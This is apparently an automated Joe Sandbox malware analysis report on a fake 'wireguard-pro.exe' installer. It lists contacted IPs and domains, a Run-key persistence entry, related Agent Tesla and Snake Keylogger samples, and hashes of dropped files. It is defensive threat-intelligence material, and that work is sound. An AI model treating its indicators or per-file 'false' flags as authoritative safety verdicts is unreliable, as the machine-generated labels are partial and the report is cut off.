https://www.entrust.net/rpa0	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.618947019.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	unknown	United States	16989	UTMEMUS	false
136.144.57.121	wireguard.com	United States	54825	PACKETUS	false
172.67.150.79	rakishev.net	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	unknown	United States	31898	ORACLE-BMC-31898US	false
158.101.44.242	unknown	United States	31898	ORACLE-BMC-31898US	false
104.21.88.34	unknown	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1319033
Start date and time:	2023-10-03 22:34:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	wireguard-pro.exe
Detection:	MAL
Classification:	mal90.phis.troj.spyw.expl.evad.winEXE@24/53@34/7
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 175 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 184.28.138.140, 20.96.52.198, 52.154.209.174, 20.22.113.133
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, tse1.mm.bing.net, ctldl.windowsupdate.com, e6913.dscx.akamaiedge.net, eus2s2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, ocsp.entrust.net.edgekey.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, eus2s1c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, uscs2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com
Execution Graph export aborted for target wireguard-pro.exe, PID 7080 because it is empty
Execution Graph export aborted for target wireguard.exe, PID 3068 because there are no executed function
Execution Graph export aborted for target wireguard.exe, PID 6736 because there are no executed function
Execution Graph export aborted for target wireguard.exe, PID 7076 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: wireguard-pro.exe

Simulations

Behavior and APIs

Time	Type	Description
22:35:08	API Interceptor	1x Sleep call for process: wireguard.exe modified
22:35:13	API Interceptor	9189823x Sleep call for process: HQL82NEF.exe modified
22:35:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\audddd\audddd.exe
22:35:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\audddd\audddd.exe
22:36:20	API Interceptor	7x Sleep call for process: svchost.exe modified
22:36:32	API Interceptor	4457556x Sleep call for process: audddd.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Overwatch-Setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	dekontMPS20231003.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	VSL_Q88.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	AEAT_-_Aviso_de_Notificaci#U00f3n.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	factura.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SQ230000000828186.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	checkip.dyndns.org/
	D09865445789-0987654.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SWIFT_USD_14.500,00_20231002104546.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	cuenta7f8e-a08c-5064_(2).exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	AEAT_-_Aviso_de_Notificaci#U00f3n.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SurfsharkSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	MullvadVPN-2023.4.exe	Get hash	malicious	Agent Tesla, AgentTesla, FormBook	Browse	checkip.dyndns.org/
	avira_en_vpnb0_19374396-127457345__pvpnws-spotlightvpnadw-test.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Hesap_Hareketleri__20230929_194202031.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	zAev9hmjpy.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	checkip.dyndns.org/
	Quotation.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	checkip.dyndns.org/
	PO23-00016.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	checkip.dyndns.org/
	Icsmcwcw.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rakishev.net	update.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79
rakishev.net	Overwatch-Setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
checkip.dyndns.com	update.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	Overwatch-Setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.8.169
	dekontMPS20231003.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Vhycf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	VSL_Q88.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	AEAT_-_Aviso_de_Notificaci#U00f3n.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	AEAT_-_Aviso_de_Notificaci#U00f3n_(2).exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Invoice.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	193.122.130.0
	factura.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SQ230000000828186.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	193.122.6.168
	D09865445789-0987654.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	MullvadVpnSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	SurfsharkSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	ThreatHunterAssessmentTool.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	avira_en_vpnb0_1932501596-1695807994__pvpnws-spotlightvpnadw-test.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	S98654567899865.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SWIFT_USD_14.500,00_20231002104546.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	Overwatch-Setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	dekontMPS20231003.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	VSL_Q88.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Notificaci#U00f3n-AEAT.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	AEAT_-_Aviso_de_Notificaci#U00f3n.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Invoice.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	132.226.247.73
	factura.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SQ230000000828186.exe	Get hash	malicious	AgentTesla, Snake Keylogger	Browse	132.226.8.169
	D09865445789-0987654.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	MullvadVpnSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	SurfsharkSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	ThreatHunterAssessmentTool.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	avira_en_vpnb0_1932501596-1695807994__pvpnws-spotlightvpnadw-test.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	SWIFT_USD_14.500,00_20231002104546.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	12erGBueoj.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	FIG0kNB2wS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	cuenta7f8e-a08c-5064_(2).exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	AEAT_-_Aviso_de_Notificaci#U00f3n.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SurfsharkSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.8.169
CLOUDFLARENETUS	Creal.exe	Get hash	malicious	Creal Stealer	Browse	162.159.128.233
	update.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	ruhsat_skodafavorit_.bat	Get hash	malicious	Creal Stealer	Browse	162.159.135.232
	https://imagine-frontend.t4x4.c14.e2-4.dev/images/imagine-icon.png	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	172.67.151.219
	https://tracker.club-os.com/campaign/click?msgId=&test=true&target=https://entrance.cfd/fromf/freedom/2gg28g/bGxhbmdkb25AbWF5ZXJicm93bi5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://republicawp.com/rep/red.php?email=bGlzYS5keWNoYWxhQG1lc3Nlci11cy5jb20==&base_url=*.republicawp.com&u=circuloelfortin.com/best/dhsgggeyh/bGlzYS5keWNoYWxhQG1lc3Nlci11cy5jb20=	Get hash	malicious	Unknown	Browse	1.1.1.1
	Overwatch-Setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.88.34
	https://99images.com/android/business/com.axis.cbk/download	Get hash	malicious	Unknown	Browse	104.22.70.197
	https://www.google.com/search?q=ai+image+generator&rlz=1C1ONGR_enUS983US985&oq=ai+image+&gs_lcrp=EgZjaHJvbWUqDQgAEAAYgwEYsQMYgAQyDQgAEAAYgwEYsQMYgAQyDAgBEAAYQxixAxiKBTIGCAIQRRg5MgkIAxAAGEMYigUyDQgEEAAYgwEYsQMYgAQyDQgFEAAYgwEYsQMYgAQyDQgGEAAYgwEYsQMYgAQyDQgHEAAYgwEYsQMYgAQyDQgIEAAYgwEYsQMYgAQyDQgJEAAYgwEYsQMYgATSAQgyMzAzajBqN6gCALACAA&sourceid=chrome&ie=UTF-8	Get hash	malicious	Unknown	Browse	172.64.149.40
	https://delcity-my.sharepoint.com/:b:/g/personal/tlongley_cityofdelcity_org/ERB3Aldp34pFriZn4dEPUgkB0jH50mK2aPtlCKbnj5Bu6A?e=sSZInP	Get hash	malicious	Unknown	Browse	1.1.1.1
	YP61700IK.exe	Get hash	malicious	GuLoader	Browse	104.21.19.237
	E-dekont.exe	Get hash	malicious	GuLoader	Browse	172.67.135.37
	HXHdAK5GSf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.21.10.223
	YISiiML6Uj.exe	Get hash	malicious	FormBook, NSISDropper	Browse	172.67.198.50
	E-dekont.exe	Get hash	malicious	GuLoader	Browse	104.21.26.17
	https://t.ly/7xTIs/#questions@op-f.org	Get hash	malicious	Unknown	Browse	104.26.13.201
	dekontMPS20231003.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.135.233
	https://www.menti.com/alzftmw5u4mf	Get hash	malicious	Unknown	Browse	172.64.146.149
	po#_72842.2023.xls	Get hash	malicious	FormBook, NSISDropper	Browse	23.227.38.74
PACKETUS	HXHdAK5GSf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	85.202.174.60
	221036299-043825-sanlccjavap0004-6531-1.xls	Get hash	malicious	FormBook, NSISDropper	Browse	85.202.174.60
	po#_72842.2023.xls	Get hash	malicious	FormBook, NSISDropper	Browse	85.202.174.60
	sora.arm.elf	Get hash	malicious	Mirai	Browse	185.216.200.251
	SecuriteInfo.com.Linux.Siggen.9999.17990.30754.elf	Get hash	malicious	Mirai	Browse	185.216.200.237
	2W5qOPq2ej.elf	Get hash	malicious	Unknown	Browse	147.75.74.29
	Hu25VEa8Dr.exe	Get hash	malicious	Gamarue	Browse	147.75.61.38
	B0mj5NUW9x.exe	Get hash	malicious	Gamarue	Browse	147.75.63.87
	https://nxslink.thehill.com/click/32875279.127760/aHR0cHM6Ly9iaXQubHkvM3Q2Qks2dT9lbWFpbD00NjdjYjYzOTljYjdkZjY0NTUxNzc1ZTQzMTA1MmI0M2E3NzVjNzQ5JmVtYWlsYT0xMmE2ZDRkMDY5Y2Q1NmNmZGRhYTM5MWMyNGViNzA0MiZlbWFpbGI9MDU0NTI4ZTc0MDM4NzFjNzlmNjY4ZTQ5ZGQzYzQ0YjFlYzAwYzdmNjExYmY5Mzg4Zjc2YmIyMzI0ZDZjYTVmMyZ1dG1fc291cmNlPVNhaWx0aHJ1JnV0bV9tZWRpdW09ZW1haWwmdXRtX2NhbXBhaWduPTkuMjklMjAxMjozMCUyMFJlcG9ydCUyMC0lMjBFTQ/6230d9a3b246d10495316347Bb62418ca	Get hash	malicious	Unknown	Browse	147.75.198.144
	maCx86.elf	Get hash	malicious	Mirai	Browse	147.75.37.67
	mpsl.elf	Get hash	malicious	Mirai	Browse	107.161.124.114
	Document2090.pdf.vbs	Get hash	malicious	ScreenConnect Tool	Browse	147.75.84.236
	jk.msi	Get hash	malicious	ScreenConnect Tool	Browse	147.75.81.252
	protect.msi	Get hash	malicious	ScreenConnect Tool	Browse	147.75.84.236
	SecuriteInfo.com.FileRepMalware.7722.9222.exe	Get hash	malicious	FormBook, NSISDropper	Browse	85.202.174.60
	SecuriteInfo.com.Trojan.Inject4.61235.12113.20285.exe	Get hash	malicious	FormBook, NSISDropper	Browse	85.202.174.60
	SecuriteInfo.com.W32.Formbook.AA.tr.15627.15839.exe	Get hash	malicious	DBatLoader, FormBook	Browse	185.212.70.213
	https://4h.zsuites.org/	Get hash	malicious	Unknown	Browse	147.75.40.150
	SWIIFT_221036299-043825-sanlccjavap0004.xls	Get hash	malicious	FormBook, NSISDropper	Browse	85.202.174.60
	PURCHASE_ORDER_091020.exe	Get hash	malicious	FormBook	Browse	185.212.71.237

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bd0bf25947d4a37404f0424edf4db9ad	YELygoRQbX.exe	Get hash	malicious	AgentTesla	Browse	136.144.57.121
	Payment_Advice_PHHSBC3J02663515-T01.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	136.144.57.121
	5272354716_INV_JKT_WJG_001_20231003_620140.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	136.144.57.121
	MY00111Q0500972MYKUL_314ZSG_2023-10-02.vbs	Get hash	malicious	GuLoader	Browse	136.144.57.121
	jnR20cRcx8.exe	Get hash	malicious	Unknown	Browse	136.144.57.121
	reservation_info(date,_name_and_etc).exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	https://www.smore.com/6gtvj	Get hash	malicious	Unknown	Browse	136.144.57.121
	Swift_Copy.exe	Get hash	malicious	AgentTesla	Browse	136.144.57.121
	879572458.mov	Get hash	malicious	Unknown	Browse	136.144.57.121
	ODC200000035_SCAN_DOCS.vbe	Get hash	malicious	GuLoader	Browse	136.144.57.121
	http://dcfdtraining.com	Get hash	malicious	Unknown	Browse	136.144.57.121
	file.exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	file.exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	file.exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	file.exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	file.exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	file.exe	Get hash	malicious	RedLine	Browse	136.144.57.121
	Tzhwq.exe	Get hash	malicious	Snake Keylogger	Browse	136.144.57.121
	CCleanerBundle-616-Setup.exe	Get hash	malicious	Raccoon Stealer v2, RedAlert	Browse	136.144.57.121
	CCleanerBundle-616-Setup.exe	Get hash	malicious	Raccoon Stealer v2, RedAlert	Browse	136.144.57.121
54328bd36c14bd82ddaa0c04b25ed9ad	update.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79 104.21.88.34
	INQUIRY0092709092023.exe	Get hash	malicious	AveMaria, UACMe	Browse	172.67.150.79 104.21.88.34
	Heplan-LGP147e2bdf5a0a4f2d84c65c574845825a-en.exe	Get hash	malicious	Unknown	Browse	172.67.150.79 104.21.88.34
	Heplan-LGP147e2bdf5a0a4f2d84c65c574845825a-en.exe	Get hash	malicious	Unknown	Browse	172.67.150.79 104.21.88.34
	Segundo_comprobante_de_pago.vbs	Get hash	malicious	AgentTesla	Browse	172.67.150.79 104.21.88.34
	xD0aqsLra5.exe	Get hash	malicious	LimeRAT	Browse	172.67.150.79 104.21.88.34
	ThreatHunterAssessmentTool.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79 104.21.88.34
	Asian_0210.pdf.vbs	Get hash	malicious	AgentTesla	Browse	172.67.150.79 104.21.88.34
	RFQ_02-10-2023.vbs	Get hash	malicious	AgentTesla	Browse	172.67.150.79 104.21.88.34
	VMBHNCF{68111D07-1E25-4791-835A-CA847E8E5AA0}#U00aevnfc.msi	Get hash	malicious	Unknown	Browse	172.67.150.79 104.21.88.34
	230284_ADAC.vbs	Get hash	malicious	AgentTesla	Browse	172.67.150.79 104.21.88.34
	ERJ.vbs	Get hash	malicious	AgentTesla	Browse	172.67.150.79 104.21.88.34
	D0sa8zw1O1.exe	Get hash	malicious	Unknown	Browse	172.67.150.79 104.21.88.34
	SurfsharkSetup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79 104.21.88.34
	ProtonVPN_v3.2.1.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79 104.21.88.34
	MullvadVPN-2023.4.exe	Get hash	malicious	Agent Tesla, AgentTesla, FormBook	Browse	172.67.150.79 104.21.88.34
	avira_en_vpnb0_19374396-127457345__pvpnws-spotlightvpnadw-test.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.150.79 104.21.88.34
	mw2.exe	Get hash	malicious	Metasploit	Browse	172.67.150.79 104.21.88.34
	mw3.exe	Get hash	malicious	Metasploit	Browse	172.67.150.79 104.21.88.34
	mw2.exe	Get hash	malicious	Metasploit	Browse	172.67.150.79 104.21.88.34

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\WireGuard\wireguard.exe	http://download.wireguard.com	Get hash	malicious	Unknown	Browse
C:\Program Files\WireGuard\wireguard.exe	wireguard-amd64-0.5.3.msi	Get hash	malicious	Unknown	Browse
C:\Program Files\WireGuard\wg.exe	http://download.wireguard.com	Get hash	malicious	Unknown	Browse
C:\Program Files\WireGuard\wg.exe	wireguard-amd64-0.5.3.msi	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	http://download.wireguard.com	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\51c701.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8008
Entropy (8bit):	5.645314936232062
Encrypted:	false
SSDEEP:	96:xmnyV0tTsJe6VCSeUteWCsvVOUteWC6jxLepj7vV5zjI5A6MWT6XTuACUpljxLH0:MnyVGYJeitWwtWsL+I9MH6UpDLU
MD5:	FFECC17C1FEE28473A2FD03F2F456C18
SHA1:	84E2874C601888B329EA4ADCA4F7A4B1BA7DABEC
SHA-256:	A4EA0FA518B19D154A3ED45279E3EB4BBE1CA70AD3778794BCA113B2256FD8EB
SHA-512:	FFFF8DE669C405728A4685F1807BBC5CBCC917280347BA93ADFB029BF25C4CA992F25D5836CF883C80977C8A1D74B829F269ED9FD4C9F890618F02E1A4E08B74
Malicious:	false
Preview:	...@IXOS.@.....@a.CW.@.....@.....@.....@.....@.....@......&.{2FDB79CE-5193-4A39-82BB-E00158CC1533}..WireGuard@.4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.@.....@.....@.....@......wireguard.ico..&.{51929F59-526D-4355-9FAE-F30E76139FBB}.....@.....@.....@.....@.......@.....@.....@.......@......WireGuard......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{C3508D23-3362-47CE-9220-321BDB1A1ACC}&.{2FDB79CE-5193-4A39-82BB-E00158CC1533}.@......&.{540CF446-FCC3-4452-B9FB-EB4C02780251}&.{2FDB79CE-5193-4A39-82BB-E00158CC1533}.@........KillWireGuardProcesses....RemoveConfigFolder....RemoveAdapters....InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]....C:\Program Files\WireGuard\....!.C:\Program Files\WireGuard\wg.exe....(.C:\Program Files\WireGuard\wireguard.exe....CreateShortcuts..Creating shortcuts..Shortcut: [1]....I.C:\Windows\Installer\{2FDB79CE-5193-4A

C:\Config.Msi\51c703.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	5.105599645205327
Encrypted:	false
SSDEEP:	6:Ea3LMplAS/+/YeXV+b+f3fm1gaYXNS04biXlTZj1jmuBkgmll/VnXAigsuRYaRsx:EgixmBl+bGviS9BTZjpkj//xAXfNo7
MD5:	8DA3B970E54742A6836782D2EB6EA112
SHA1:	E657BC1B61096EE8089964A126A1452800D6F052
SHA-256:	3F3339C459AEBD2E1E9F4D8E84E81E6532646B4E41D486FB90EF788C7E1E7A33
SHA-512:	E120539C19D463950613B2A1E413B87D4D9EBEDC1971094DA358C26BFF279B59EBD02F7DA2679AD6D68355002EB93AD03F7C0F3B9EE243B10C2FEBDEC7D6B388
Malicious:	false
Preview:	...@IXOS.@.....@d.CW.@.....@.....@.....@.....@.....@......&.{2FDB79CE-5193-4A39-82BB-E00158CC1533}..WireGuard@.4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.@.....@.....@.....@......wireguard.ico..&.{51929F59-526D-4355-9FAE-F30E76139FBB}.....@.....@.....@.....@.......@.....@.....@.......@......WireGuard......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....LaunchApplication...@.....@.....@....

C:\Program Files\WireGuard\Data\log.bin

Download File

Process:	C:\Program Files\WireGuard\wireguard.exe
File Type:	data
Category:	dropped
Size (bytes):	1064968
Entropy (8bit):	0.0028777929932559086
Encrypted:	false
SSDEEP:	6:Mo/l+r6RWHQqygDUWq/6TmduWVyF9YAWlISGs:Moi6RWwDgIWq/6pFXi/G
MD5:	840A196CB886E0C75A6C7FE8692E183D
SHA1:	9CFD05ECC8AA168DFE0C2DFA1F3A48C926D3822B
SHA-256:	AD753FD05902A23C4792E78523D372BA8B33C5844188CC9A97B8DDE9FF59E0C2
SHA-512:	1DB7EA0D82295908ADFCBA748C2414B415BC0D7DBAA712D472DE40467426D1253D10B1F13F38988E631CD9E661934455D76C24BFFA38D6AF66A245B589B8BF13
Malicious:	false
Preview:	.........q.oB...[MGR] Starting WireGuard/0.5.3 (Windows 10.0.17134; amd64)........................................................................................................................................................................................................................................................................................................................................................................................................................................................................(qB...[MGR] Starting UI process for user .user@computer. for session 1....................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\WireGuard\wg.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	148272
Entropy (8bit):	6.445997772605011
Encrypted:	false
SSDEEP:	3072:V84stuWEP3ZeKCcmmLETHuUoy4ZouLWAKsK/7:+4stvLKCcmmLETHuKgi1/7
MD5:	B59871A1BD7AEC6DC714B1DB3488FF28
SHA1:	7C6FEBE210E782773C787822765852ED26C165EE
SHA-256:	F6CFCDD6933B5D50CD2446BF8CA611C1CF9E825A0FBA13DB13DFE4D24EEC37B9
SHA-512:	122BD9C0F31EB7D5F760A38F55F7F36F60A59314499220A179BE004DBCBA43E1C9143B71470BAA643FC8F629DED2FB62C5851C270B522B28466976021CBD090B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: wireguard-amd64-0.5.3.msi, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Te.a.........."..........N......0..........@....................................l.....`.....................................................P.......................03......................................(.......................x............................text............................... ..`.rdata...2.......4..................@..@.data....v..........................@....pdata..............................@..@.tls................................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\WireGuard\wireguard.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8185648
Entropy (8bit):	6.1595246054365465
Encrypted:	false
SSDEEP:	98304:TD3K0YyOAYcd0ZLpNu6JmM1W8YcTpOG7ZE78a:TLzUwsFYc9OG7ZE78a
MD5:	18D5B6964A434AF936E1DB19D969DBBB
SHA1:	61AB3AC36394D5A49B6E24CF6498A1F80F3A6A99
SHA-256:	32717D15B57965ADF78B33F61DB32CB26E11759DD78D441A218DD349C731A160
